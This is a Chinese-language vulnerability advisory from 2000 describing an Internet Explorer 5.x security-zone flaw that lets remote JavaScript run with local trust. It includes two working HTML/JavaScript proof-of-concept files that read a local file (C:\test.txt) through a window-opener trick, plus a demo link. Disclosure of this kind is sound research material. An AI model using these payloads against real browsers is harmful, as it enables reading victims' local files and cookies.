Microsoft IE安全区域设置漏洞
发布日期:2000-01-08
更新日期:2000-01-08
受影响系统:Microsoft Internet Explorer 5.5 preview
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000.0
描述:
当一个新的文档装载到IE窗口时,直到新的文档全部装载完之前,IE不进行安全区的重新设置。这就意味着如果一个本地文档被装载时,同时装载一个包含JavaScript的远程文档,在安全区更新前,这个JavaScript可以装载和运行。可以导致远程的非信任JavaScript以本地信任代码来执行,可以对本地文件、cookies等进行访问。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------
----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open(''javascript:alert(\''Here is your file: \''+opener.document.body.innerText)'');alert(''Just an alert, but is necessary. Wait a little.'')">
</HTML>
---------------------------------------------------------------------
演示:
http://www.nat.bg/~joro/img2main.html
建议:
暂无
浏览次数:6896
严重程度:0(网友投票)
